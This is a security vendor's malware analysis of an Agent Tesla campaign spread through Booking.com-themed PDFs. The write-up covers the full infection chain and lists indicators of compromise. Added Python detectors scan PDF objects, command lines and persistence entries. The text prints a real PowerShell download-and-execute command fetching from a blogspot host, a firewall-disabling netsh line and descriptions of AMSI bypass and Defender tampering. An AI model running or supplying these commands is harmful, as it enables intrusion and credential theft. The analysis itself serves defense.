Saturday, March 2, 2024

Rise in Deceptive PDF: The Gateway to Malicious Payloads


Authored by Yashvi Shah and Preksha Saxena

McAfee Labs has recently observed a significant surge in the distribution of prominent malware through PDF files. Malware is not solely sourced from dubious websites or downloads; certain instances of malware may reside within apparently innocuous emails, particularly within the PDF file attachments accompanying them. The following trend, observed over the past three months through McAfee telemetry, pertains to the prevalence of malware distributed through non-portable executable (non-PE) vectors.

Figure 1: Rise in PDF malware

Why PDF?

Upon implementing Microsoft's macro-blocking measures for Internet-delivered Office files, threat actors were compelled to devise alternative methods for email malware distribution. The complex structure of PDF files renders them susceptible to exploitation, posing significant challenges in detecting malicious content within them. As a commonly employed file format distributed via email attachments in the consumer domain, PDFs represent an attractive avenue for attackers to deceive users into believing they are benign. Exploiting this trust, attackers can readily craft PDF-based malware, often containing payloads hosted on malicious websites. Upon user interaction, such as clicking a link, these PDFs download the hosted payload, exacerbating the risk of infection.

Infection Chain

This emerging infection chain involving, among others, Agent Tesla, initiates from an email containing a PDF attachment, which subsequently facilitates the delivery of the final payload. In the old and unpatched version of Acrobat Reader, PDFs directly execute embedded JavaScript using MSHTA, subsequently launching PowerShell, which performs process injection. Conversely, in the latest version of Acrobat Reader, PDFs are unable to execute JavaScript directly. Instead, they redirect to a malicious website, from which the script is downloaded. The subsequent process remains consistent with the previous case. The kill chain for the delivery of Agent Tesla unfolds as follows:

Figure 2: Infection Chain

Initial Access:

Firstly, we will address the scenario involving the updated version of Acrobat Reader, as it is likely that the majority of users will have this version installed. Typically, these PDF files are disguised under various themes such as invoices featuring a prominent download button, messages prompting immediate action, or buttons designed to redirect users to seemingly benign destinations.

In a recent attack, a file named "Booking.com-1728394029.pdf" was used. It is evidently targeting users under the guise of being affiliated with Booking.com. It displays a prompt stating, "Lettore non è compatibile!", which translates to "Player is not compatible," as depicted in the figure below.

Figure 3: Face of PDF attachment

Upon analyzing the internal structure of the PDF (Figure 4), it was discovered that one of the seven objects contained some hex data and an embedded URL. The URL highlighted in the red box, "https://bit[.]ly/newbookingupdates", is a Bitly URL. Attackers use Bitly URLs to hide malicious links, making them harder to detect. This is especially useful in phishing schemes where they trick users into revealing sensitive information. Bitly's dynamic links allow attackers to change destinations, enhancing their ability to evade detection. Additionally, attackers exploit the trust associated with Bitly to improve the success of their social engineering tactics.

This URL is intended to connect to https://bio0king[.]blogspot[.]com

Figure 4: Embedded data in PDF

The text highlighted in yellow in Figure 4 appears to be in hexadecimal format. Upon converting it to ASCII, the result is as follows:

Figure 5: ASCII Conversion

This is the reason behind the prompt observed in Figure 3: the same alert message is displayed upon opening the PDF document.

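To make the object-level inspection from Figures 4 and 5 repeatable, the following Python script (an added example, not part of the original write-up or of McAfee's tooling) walks a PDF's objects, flags the dictionary keys that trigger actions (/OpenAction, /JS, /URI and so on), decodes hex strings to text and pulls out embedded URLs, marking any that point at a public URL shortener. The sample PDF embedded in it is constructed to mirror the structure described above; the alert text, object layout and shortener link are stand-ins, not the real attachment.

```python
"""Static triage of a PDF's object tree for the indicators discussed above:
active-content dictionary keys, hex-encoded strings and embedded URLs.
Added example; the sample PDF below is constructed, not the real attachment."""
import re
from urllib.parse import urlparse

# Dictionary keys that make a PDF do something when opened or clicked.
RISKY_KEYS = ("/OpenAction", "/AA", "/JavaScript", "/JS", "/Launch", "/URI",
              "/SubmitForm", "/EmbeddedFile", "/RichMedia")
# Illustrative list of public URL shorteners (the real sample used bit.ly).
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "is.gd", "cutt.ly"}

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj(.*?)endobj", re.S)
# A PDF hex string is <hexdigits>; the lookarounds keep << and >> delimiters out.
HEX_RE = re.compile(rb"(?<!<)<([0-9A-Fa-f][0-9A-Fa-f\s]*)>(?!>)")
URI_RE = re.compile(rb"/URI\s*\(([^)]*)\)")
URL_RE = re.compile(r"https?://[^\s\"'<>)]+")


def decode_hex_string(raw: bytes) -> str:
    """Decode a PDF hex string: whitespace is ignored, an odd digit count pads with 0."""
    digits = re.sub(rb"\s+", b"", raw)
    if len(digits) % 2:
        digits += b"0"
    return bytes.fromhex(digits.decode("ascii")).decode("latin-1")


def hostname(url: str) -> str:
    return (urlparse(url).hostname or "").lower()


def scan_pdf(data: bytes) -> dict:
    """Walk every 'N G obj ... endobj' block and collect what an analyst checks first."""
    report = {"objects": [], "risky_keys": set(), "decoded_strings": [], "urls": []}
    for num, _gen, body in OBJ_RE.findall(data):
        keys = [k for k in RISKY_KEYS if k.encode() in body]
        decoded = [decode_hex_string(h) for h in HEX_RE.findall(body)]
        urls = [u.decode("latin-1") for u in URI_RE.findall(body)]
        for text in decoded:                 # URLs hidden inside hex strings count too
            urls.extend(URL_RE.findall(text))
        if keys or decoded or urls:
            report["objects"].append({"num": int(num), "keys": keys,
                                      "decoded": decoded, "urls": urls})
            report["risky_keys"].update(keys)
            report["decoded_strings"].extend(decoded)
            report["urls"].extend(urls)
    report["shortener_urls"] = [u for u in report["urls"] if hostname(u) in SHORTENERS]
    return report


# Constructed stand-in for the alert text; the real PDF showed "Lettore non è compatibile!".
_JS = 'app.alert("Lettore non e compatibile!");'
# Constructed minimal PDF: OpenAction -> hex-encoded JavaScript, plus a link to a shortener.
SAMPLE_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /Annots [5 0 R] >> endobj\n"
    b"4 0 obj << /S /JavaScript /JS <" + _JS.encode().hex().encode() + b"> >> endobj\n"
    b"5 0 obj << /Type /Annot /Subtype /Link /A << /S /URI "
    b"/URI (https://bit.ly/constructed-example) >> >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    result = scan_pdf(SAMPLE_PDF)
    for obj in result["objects"]:
        print(f"obj {obj['num']}: keys={obj['keys']} urls={obj['urls']} decoded={obj['decoded']}")
    print("shortener URLs:", result["shortener_urls"])
```

Run against a real file with `scan_pdf(open(path, "rb").read())`; compressed object streams are not inflated here, so a clean result on a file that uses /ObjStm only means nothing was visible in the uncompressed objects.
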
After clicking "OK," another prompt appeared from Adobe Player, cautioning about the connection being established to the address mentioned in the prompt, i.e. "bit.ly".

Figure 6: Connection to embedded URL

Upon granting permission for redirection, the user is directed to the website "https://bio0king[.]blogspot[.]com". Thus, an attempt is made to disguise it as a legitimate Booking.com website. As illustrated in the figure below, Microsoft Defender SmartScreen alerts the user to the harmful nature of this website. Despite the warning, further analysis was conducted by proceeding to the website to observe subsequent actions.

Figure 7: Connection to disguised website

Upon accessing the website, it was observed that a JavaScript file named "Booking.com-1728394029.js" was promptly downloaded. The .js file was deliberately named identically to the PDF file in an effort to deceive users into opening it.

Figure 8: Prompt of JS file download

Immediately upon initiating the download, a redirection to the legitimate Booking.com website is triggered, aiming to prevent users from detecting any suspicious activity. The downloaded file is saved in the Downloads folder on the user's system.

Figure 9: JS file downloaded

The content of the JavaScript file is heavily obfuscated. This tactic is commonly employed by attackers to conceal their code, thus complicating analysis efforts and evading detection mechanisms.

Figure 10: JS file content

Execution:

Upon executing the JavaScript, the following process tree was observed:

Figure 11: Process tree

Command line:

  • "C:\Windows\System32\WScript.exe" "C:\Users\admin\Downloads\Booking.com-1728394029.js"
    • "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm htloctmain25.blogspot.com/////////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 5
      • \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      • "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\mk2qsd2s.cmdline"
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES6D2D.tmp" "c:\Users\admin\AppData\Local\Temp\CSC7C83DF075A344945AED4D733783D6D80.TMP"
      • "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue
      • "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Upon decoding and executing "Booking.com-1728394029.js," a URL was obtained: "htloctmain25.blogspot.com/////////////////////////atom.xml."

Using the PowerShell command line, an attempt was made to access the file located at htloctmain25.blogspot.com/////////////////////////atom.xml, followed by executing the file using Invoke-Expression (iex). In this instance, the attackers tried to obfuscate the Invoke-Expression (iex) command by using the replace method within the PowerShell command line. As illustrated in the command line, a sleep command was implemented, pausing execution for 5 seconds. Subsequent stages of the infection proceeded after this interval.

The file hosted at http://htloctmain25.blogspot.com/////////////////////////atom.xml is named atom.ps1, measuring roughly 5.5 MB in size. The figure below depicts the content of the file:

Figure 12: Content of .ps1 file

Let's begin deciphering this script shown in Figure 11 with reference:

The red marked content at the top of the script indicates that it will terminate several specified processes ("RegSvcs", "mshta", "wscript", "msbuild", "FoxitPDFReader"), presumably with the intention of injecting the final payload into one of these legitimate binaries. Additionally, the script creates a directory at "C:\ProgramData\MINGALIES" for potential future use.

The blue marked content within the script represents the decryption function, labeled "asceeeeeeeeeeeeeeee". This function is subsequently employed to decrypt various variables within the script.

The green marked content towards the end of the script outlines the implementation of the persistence mechanism and describes the injection process into legitimate executables.

For reference and ease of comprehension, the variables defined in the script have been numbered accordingly. The decryption instructions for these variables are highlighted in yellow for clarity and emphasis.

Following the sequence of instructions, if any of the specified processes are terminated, the script proceeds to define variables 1 and 2. Subsequently, the decryption loop is defined in the script. After the decryption loop, variable 3, named "Phudigum", is defined. Following that, the script decrypts variable 3 and executes the resulting decoded data using the Invoke-Expression (IEX) command.

Defense Evasion:

The content of the decoded variable 3 is as follows:

Figure 13: Variable 3 after decryption

The code first bypasses Microsoft Windows Anti-Malware Scan Interface (AMSI) scanning by setting a specific value and then proceeds to create registry entries for persistence. The script also defines functions for interacting with the system's memory and sets the global error action preference to silently continue, suppressing any errors. It checks whether a type named AMSIReaper exists and, if not, defines this type with various declarations for interacting with the Windows kernel32.dll, including functions related to process memory manipulation.

Furthermore, the script executes a series of malicious actions aimed at compromising the security of the system. It begins by adding exclusions for specific file extensions, paths, and processes in Windows Defender, effectively evading detection for these items. Subsequently, it attempts to modify various Windows Defender preferences, such as disabling critical security features like the Intrusion Prevention System, Real-time Monitoring, and Script Scanning, while also adjusting settings related to threat actions and reporting. Additionally, the script tries to modify registry settings associated with User Account Control (UAC) and to disable the Windows Firewall, further weakening the system's defenses. Finally, it resets the global error action preference to continue, potentially concealing any errors encountered during execution and ensuring the script's malicious actions remain undetected. Overall, these actions indicate a concerted effort to compromise the system's security and potentially enable further malicious activities.

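The command lines in the process tree above, together with the Defender, firewall and UAC tampering described in this section, are what an endpoint detection rule has to pick apart. The following Python triage (an added example, not from the original write-up or from McAfee) first folds the ('i*x').replace('*','e') trick back into the literal it builds, then tags each command line with the behaviours it exhibits. The three command lines taken from the process tree are reproduced with their backslashes restored; the Defender-tampering line, the benign line and the C:\ProgramData\EXAMPLE path are constructed stand-ins.

```python
"""Triage of PowerShell/LOLBin command lines as seen in the process tree above.
Added example: normalize the ('i*x').replace('*','e') string-rebuild trick, then tag
behaviours (download cradle, policy bypass, Defender/firewall tampering, ...)."""
import re

# ('i*x').replace('*','e')  ->  'iex'
REPLACE_TRICK = re.compile(
    r"\(\s*'([^']*)'\s*\)\.replace\(\s*'([^']*)'\s*,\s*'([^']*)'\s*\)", re.I)

RULES = [
    ("exec-policy-bypass", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)),
    ("download-cradle", re.compile(
        r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile|net\.webclient)\b", re.I)),
    ("invoke-expression", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("string-rebuild-obfuscation", REPLACE_TRICK),
    ("sleep-delay", re.compile(r"start-sleep", re.I)),
    ("free-blog-host-c2", re.compile(r"\.blogspot\.com", re.I)),
    ("defender-tamper", re.compile(
        r"(?:set|add)-mppreference|disablerealtimemonitoring|exclusion(?:path|extension|process)", re.I)),
    ("firewall-disable", re.compile(r"netsh(?:\.exe)?\"?\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I)),
    ("uac-tamper", re.compile(r"enablelua|consentpromptbehavioradmin", re.I)),
    ("amsi-reference", re.compile(r"amsi", re.I)),
    ("script-host-launch", re.compile(r"\b(?:wscript|cscript|mshta)\.exe\b", re.I)),
]


def normalize(cmd: str) -> str:
    """Fold string-rebuild expressions back into the literal they produce, until stable."""
    def fold(m):
        src, old, new = m.group(1), m.group(2), m.group(3)
        return m.group(0) if old == "" else "'" + src.replace(old, new) + "'"
    prev = None
    while prev != cmd:
        prev, cmd = cmd, REPLACE_TRICK.sub(fold, cmd)
    return cmd


def triage(cmd: str) -> dict:
    """Return the normalized command line and the sorted list of matched behaviour tags."""
    norm = normalize(cmd)
    tags = sorted(name for name, rx in RULES if rx.search(cmd) or rx.search(norm))
    return {"normalized": norm, "tags": tags, "score": len(tags)}


# Three lines from the process tree in this write-up (backslashes restored), plus two
# constructed lines: one standing in for the Defender tampering the decrypted script
# performs, one benign baseline. C:\ProgramData\EXAMPLE is a placeholder path.
SAMPLES = {
    "wscript_launch": r'"C:\Windows\System32\WScript.exe" "C:\Users\admin\Downloads\Booking.com-1728394029.js"',
    "powershell_cradle": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm htloctmain25.blogspot.com/////////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 5''',
    "netsh_firewall": r'"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue',
    "defender_tamper_constructed": r'powershell.exe -c Add-MpPreference -ExclusionPath C:\ProgramData\EXAMPLE; Set-MpPreference -DisableRealtimeMonitoring $true',
    "benign_constructed": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File C:\Scripts\inventory.ps1',
}

if __name__ == "__main__":
    for label, line in SAMPLES.items():
        result = triage(line)
        print(f"{label}: score={result['score']} tags={result['tags']}")
        if result["normalized"] != line:
            print("  normalized:", result["normalized"])
```

The normalization step matters more than the rule list: a rule for `iex` alone never fires on the raw line, only on the folded one, so any telemetry pipeline should store both forms.
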
Privilege Escalation:

The next instruction in Figure 11 involves decrypting variable 2, labeled "bulgumchupitum," using the decryption function "asceeeeeeeeeeeeeeee." The result is executed by the Invoke-Expression (IEX) command. Following is the decoded content of variable 2:

Figure 14: Variable 2 after decryption

The content obtained after decrypting variable 2 holds significant importance. The section highlighted in red does the following:

  • Introduces another decryption function specifically tailored for this script, named "kimkarden."
  • Additionally, the variable "muthal," marked as variable 1 in Figure 11, is utilized within this script rather than in the main .ps1 file.
  • Furthermore, another variable is defined, and its content is stored in the variable "pinchs."
  • Finally, the content of both variables, "muthal" and "pinchs," is decrypted using the decryption function "kimkarden" and stored as byte arrays in data 1 and data 2, marked as 5 and 6, respectively, in Figure 13.
  • Data 1 and Data 2 are found to be .NET executables.

The next section, marked blue in Figure 13, does the following:

  • After a brief sleep, the script loads an assembly using the decoded content, data 1, and executes a command through reflection.
  • The script defines a function named ExecuteCommand, which uses reflection to dynamically invoke method 'C' from a type named 'A.B' loaded from an assembly.
  • It defines paths to various .NET Framework executables (RegSvcs.exe for versions 2.0 and 4.0, and Msbuild.exe for version 3.5).
  • It invokes the $invokeMethod with the $nullArray and parameters: the path of the .NET Framework executable and $data2 (the decoded byte array).

Process Injection:

Figure 15: Data 1

Data 1 comprises a .NET DLL file. As previously indicated, the script invokes the method 'C' from the type named 'A.B'. Despite the high level of obfuscation in the file shown in Figure 15, the presence of method 'C' can be observed (highlighted in yellow). Additionally, within the script, there is a specific function where the path to the framework executables and the data are being passed (highlighted within the red box).

Figure 16: Data 1 dll

This DLL is responsible for injecting data2, which is Agent Tesla, as a payload into the Regsvcs.exe process. The following figure shows the configuration of data2. The depicted configuration of data2 disguises it as a legitimate McAfee package file, as shown in Figure 16. However, it lacks a valid certificate, indicating its fraudulent nature.

Figure 17: Data2

The executable file exhibits a high degree of obfuscation, rendering its content largely unreadable. Numerous methods are present, each bearing meaningless names, a deliberate tactic employed to impede analysis by researchers.

Figure 18: Data2 exe

Discovery:

The attackers have intricately orchestrated the obfuscation process. Each string undergoes decryption through a series of instructions, with specific parameters being passed to obtain the deciphered content. This meticulous approach is designed to add layers of complexity and hinder straightforward analysis. For instance, in Figure 18, through reverse engineering, we can observe how it begins querying the browser for information. The highlighted instruction is the one which, after decryption, gives the path of the Opera browser.

Figure 19: Fetching browser information

The following ProcMon logs show all the browsers the malware queried:

Figure 20: Procmon logs of browsers (1)

Figure 21: Procmon logs of browsers (2)

Credential Access:

In addition to this, it steals sensitive information such as browser history, cookies, credentials, SMTP information, session information, and email client data such as Outlook profiles, etc.

Figure 22: Credentials

Exfiltration:

By debugging the code, we were able to uncover the domain it was using for exfiltration. The following figure shows the URL used for exfiltration:

Figure 23: Domain obtained

The same was evident from the Procmon logs shown in the figure below:

Figure 24: Procmon logs of connection for exfiltration

The DNS record of IP address 149.154.167.220 belongs to Telegram Messenger.

Figure 25: DNS record

AgentTesla leverages Telegram bots for data exfiltration due to several advantageous factors. Firstly, Telegram provides robust end-to-end encryption, ensuring the security of transmitted data. Secondly, the platform offers anonymity for bot creators, enhancing the stealth of malicious activities. Thirdly, Telegram's user-friendly interface simplifies communication processes for both attackers and their command-and-control infrastructure. Additionally, since Telegram is a widely used messaging platform, traffic to its servers may appear less suspicious compared to other channels, aiding in evading detection. Moreover, Telegram's infrastructure resilience makes it a reliable choice for maintaining communication channels even amidst takedown efforts.

Overall, the combination of security, anonymity, ease of use, stealth, and resilience makes Telegram bots an appealing choice for AgentTesla's data exfiltration tactics. To achieve this, it establishes contact with the respective domain associated with the bot and transmits the data, which is then tracked by a specific bot ID.

Figure 26: Telegram bot for exfiltration

In a nutshell, this script was tasked with decoding the payload, retrieving legitimate .NET executable paths, performing process injection to execute the malware, collecting data, and ultimately exfiltrating the acquired information.

Persistence:

Moving forward with atom.ps1 (Figure 11), the next is variable 4, labeled "koaskodkwllWWW", which is decrypted using the function "asceeeeeeeeeeeeeeee". Upon decryption, the content is decoded as follows:

Figure 27: Variable 4 decoded

This script establishes persistence by:

  1. Creating an HTA script to execute PowerShell commands fetched remotely. The script contains JavaScript code that uses ActiveX objects to execute commands. Specifically, it creates an instance of WScript.Shell to run a PowerShell command fetched from a remote location (linkcomsexi).
  2. Registering a scheduled task named "Tnamesexi" using Register-ScheduledTask. The task is set to trigger once at a specific time, calculated by adding a certain number of minutes (mynsexi) to the current time.
  3. Finally, setting a registry value under the current user's Run key (HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run). This registry value, named "Tnamesexi," is configured to execute the command schtasks /run /tn $taskName, thereby manually triggering the scheduled task established in the preceding step.

Ultimately, the content highlighted in green in Figure 11 performs the final task. The instructions are as follows:

Figure 28: Persistence instructions

Now, after substituting the values:

  • "mynsexi" is set to "213", indicating that the script will be executed again after 213 minutes.
  • "Tnamesexi" is defined as "chromeupdateri", implying that a Run entry will be created under this name.
  • "linkcomsexi" is assigned the value "htljan62024.blogspot.com//////////atom.xml", suggesting that the atom.ps1 file will be fetched again from this URL.

We inspected the registry entries and scheduled task entries for cross-verification. The script did as directed:

Figure 29: Registry entry for persistence

Figure 30: Task Scheduler

Figure 31: Procmon logs for persistence

In summary, the script is configured to execute again after 213 minutes, creating a Run entry named "chromeupdateri" and fetching the atom.ps1 file again from "htljan62024.blogspot.com//////////atom.xml".

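A defender can verify the Run key / scheduled task pairing described above from a host snapshot, without the decrypted script. The following Python check (an added example, not from the original write-up or from McAfee) correlates HKCU Run values with scheduled tasks and reports chains in which a Run entry only re-triggers a task whose action is a script host such as mshta.exe, whose arguments point at a remote URL or a user-writable path, or whose trigger is one-shot. The host snapshot in it is constructed: the task name chromeupdateri and the schtasks /run /tn shape come from the write-up, while the .hta path, the OneDrive entries and the trigger labels are stand-ins.

```python
"""Correlate Run-key values with scheduled tasks to surface the persistence chain
described above (Run value -> schtasks /run -> task -> mshta/wscript launcher).
Added example with a constructed host snapshot."""
import re
from dataclasses import dataclass

SCHTASKS_RUN = re.compile(r'schtasks(?:\.exe)?\s+/run\s+/tn\s+"?([^\s"]+)"?', re.I)
# Script hosts and shells that a scheduled task rarely needs to launch in a clean environment.
LAUNCHERS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}
# Remote fetch or user-writable staging directory in the task's arguments.
REMOTE_OR_TEMP = re.compile(r"https?://|\\(?:temp|appdata|programdata)\\", re.I)


@dataclass
class Task:
    name: str
    action: str       # executable the task runs
    arguments: str    # its command-line arguments
    trigger: str      # e.g. "Once", "Daily", "Logon"


def exe_name(command: str) -> str:
    """Return the bare executable name from a command line, quoted or not."""
    command = command.strip()
    if not command:
        return ""
    first = command[1:].split('"', 1)[0] if command.startswith('"') else command.split(None, 1)[0]
    return first.rsplit("\\", 1)[-1].lower()


def audit_persistence(run_values: dict, tasks: list) -> list:
    """run_values: {value_name: command}; tasks: [Task]. Returns one finding per suspicious Run value."""
    by_name = {t.name.lower(): t for t in tasks}
    findings = []
    for value_name, command in run_values.items():
        m = SCHTASKS_RUN.search(command)
        if m is None:
            # Run value launching a script host directly is worth a look on its own.
            if exe_name(command) in LAUNCHERS:
                findings.append({"run_value": value_name, "task": None,
                                 "reasons": ["run_key_launches_script_host"]})
            continue
        task = by_name.get(m.group(1).lower())
        reasons = ["run_key_invokes_schtasks"]
        if task is None:
            reasons.append("referenced_task_missing")
        else:
            if exe_name(task.action) in LAUNCHERS:
                reasons.append("task_action_is_script_host")
            if REMOTE_OR_TEMP.search(task.arguments):
                reasons.append("task_argument_remote_or_temp_path")
            if task.trigger.lower() == "once":
                reasons.append("one_shot_trigger")
        findings.append({"run_value": value_name, "task": m.group(1), "reasons": reasons})
    return findings


# Constructed snapshot. "chromeupdateri" and the schtasks command shape are from the
# write-up; EXAMPLE.hta and the OneDrive entries are stand-ins.
SAMPLE_RUN = {
    "chromeupdateri": r'schtasks /run /tn "chromeupdateri"',
    "OneDrive": r'"C:\Users\admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
}
SAMPLE_TASKS = [
    Task("chromeupdateri", r"C:\Windows\System32\mshta.exe",
         r"C:\Users\admin\AppData\Local\Temp\EXAMPLE.hta", "Once"),
    Task("OneDrive Standalone Update",
         r"C:\Users\admin\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe", "", "Daily"),
]

if __name__ == "__main__":
    for finding in audit_persistence(SAMPLE_RUN, SAMPLE_TASKS):
        print(finding)
```

On a live host the two inputs come from `Get-ItemProperty HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` and `Get-ScheduledTask`; the correlation is what makes the Run value stand out, since `schtasks /run` by itself is an ordinary administrative command.
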
Execution with old and unpatched version of Acrobat Reader:

Upon opening the PDF in the old, unpatched version of Acrobat Reader, a prompt immediately appeared indicating the launch of MSHTA along with the complete JavaScript code contained therein. This is depicted in the figure below.

Figure 32: Prompt for embedded JavaScript

Upon analyzing the streams of the PDF, we discovered the same script embedded within the document:

Figure 33: Embedded JavaScript in PDF

After the launch of MSHTA, an instance of PowerShell is invoked, initiating process injection into Regsvcs.exe and injection of AgentTesla. Consequently, with an old and unpatched version of Acrobat Reader, interaction with the PDF is unnecessary; merely opening the PDF file results in infection of the system by the malware.

Summary:

The chain of events initiates with the delivery of a PDF file containing malicious content. Upon opening the PDF, the embedded malicious code triggers the execution of a JavaScript payload, leading to the download and execution of a PowerShell script. This PowerShell script then decrypts and executes a binary, in the form of a .NET DLL file, which injects the AgentTesla payload into legitimate processes to evade detection. The malware communicates with command-and-control servers, exfiltrating sensitive data through Telegram bots for stealthy transmission. To ensure persistence, the malware establishes scheduled tasks and registry entries, allowing it to execute periodically and maintain its presence on the infected system. In the old version of Acrobat Reader, opening the PDF triggered the automatic execution of malicious JavaScript, leading to the injection of AgentTesla malware via PowerShell into Regsvcs.exe. Inspection of the PDF streams revealed the embedded script, further confirming the exploitation of vulnerabilities without requiring user interaction. This orchestrated sequence underscores the sophisticated nature of the attack, spanning from initial infection to data exfiltration and persistent infiltration, posing significant challenges for detection and mitigation efforts.

Mitigation:

Avoiding falling victim to email phishing involves adopting a vigilant and cautious approach. Here are some common practices to help prevent falling prey to email phishing:

  • Verify Sender Information
  • Think Before Clicking Links and Warnings
  • Check for Spelling and Grammar Errors
  • Be Cautious with Email Content
  • Verify Unusual Requests
  • Use Email Spam Filters
  • Check for Secure HTTP Connections
  • Delete Suspicious Emails
  • Keep Windows and Security Software Up to Date
  • Use the latest and patched version of Acrobat Reader

Indicators of Compromise (IOCs)

PDF 8f8264c173e6d036e87b706dbb87e3036ae17df32e53a683c87bff94fce2c242
Javascript 3ea81c292f36f2583d2291e8a393014da62767447dba7b139a6c45574647aa2b
ps1 file db726e060f4feccf4bdfa843e3c10cbac80509585fd55c6d1bfce5e312a4e429
dll 5b6d8f91201ba9c879e46062190817954e28ceb61a67e55870bb61d1960854ee
exe dec2ce698ab8600d96dd3353b5e47d802441c6df18aed1dd6a2b78311369659e
IPv4 149.154.167.220
URL http://htloctmain25.blogspot[.]com/atom.xml
URL https://bio0king[.]blogspot[.]com

Table 1: Indicators of Compromise
